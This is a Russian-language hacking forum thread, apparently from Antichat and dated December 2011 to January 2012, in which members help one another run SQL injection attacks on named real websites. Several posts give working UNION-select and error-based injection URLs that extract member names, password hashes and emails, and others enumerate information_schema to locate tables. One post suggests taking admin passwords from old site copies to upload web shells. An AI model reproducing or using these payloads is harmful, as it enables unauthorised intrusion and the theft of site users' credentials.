30.12.2011, 12:11
|
|
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
С нами:
7811606
Репутация:
21
|
|
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)
|
|
|
30.12.2011, 12:25
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от DyukiN
заливал txt, gif, jpg ниче не открывает(( хотя файлы править могу)
Попробуй править уже существующие файлы, добавь например:
Посмотри из веба, если в исходнике есть данная строка, то я хз че сказать
|
|
|
|
30.12.2011, 13:20
|
|
Участник форума
Регистрация: 10.07.2011
Сообщений: 252
С нами:
7811606
Репутация:
21
|
|
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?
|
|
|
|
30.12.2011, 13:37
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от DyukiN
походу у меня остались страые версии сайтов(( что то можно извлечь из этого?
Пароли админов. Пути к админке, потом можно залить на те сайты шеллы, без всякого хакинга
UPD. Mожет это из-за группы и овнера?
|
|
|
|
31.12.2011, 01:13
|
|
Познающий
Регистрация: 19.11.2006
Сообщений: 32
С нами:
10249722
Репутация:
5
|
|
Сообщение от Ereee
Select DISTINCT cast (Your Col Name as NVARCHAR(MAX))
а можно поподробнее на примере
Сообщение от None
-12+union+select+@@version--
как можно сделать что-бы @@VERSION выводилось?
|
|
|
|
31.12.2011, 14:42
|
|
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
С нами:
7725206
Репутация:
26
|
|
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,concat_ws(0x3a,id_member, member_name,real_name,passwd,email_address),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28+from+smf_members--+
как быть?
|
|
|
|
31.12.2011, 14:56
|
|
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
С нами:
7604246
Репутация:
55
|
|
Все просто, таблицы smf_members нет в текущей бд, она находиться в другой
Код:
http://www.audit-escort.ru/news.php?AE_content_id=-109+union+select+1,2,3,4,table_schema,6,7,8,%209,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,%2026,27,28+from+information_schema.tables+where+table_name=0x736d665f6d656d62657273+--+
|
|
|
|
31.12.2011, 17:46
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от jangle
а можно поподробнее на примере
как можно сделать что-бы @@VERSION выводилось?
-12+union+select+CONVERT(nvarchar,@@version)--
не?
|
|
|
|
01.01.2012, 23:23
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+concat_ws(0x3a,name,email,password)+from+batterika_mysql.p_users+limit+1,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
|
|
|
|
01.01.2012, 23:26
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от qaz
Почему ничего не выводит? пропадает вывод об ошибке и показывает нормально страницу
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.pitatel.ru/pclass.php?id=19+or+1+group+by+concat((select+concat_ws(0x3a,name,email,password)+from+batterika_mysql.p_users+limit+1,1),0x00,floor(rand(0)*2))having+min(0)+or+1--+[/COLOR][/COLOR]
http://www.pitatel.ru/pclass.php?id=19+and+0+union+select+1,2,3,4,count( 0),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23+from+batterika_mysql.p_users--+
таблица пуста
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
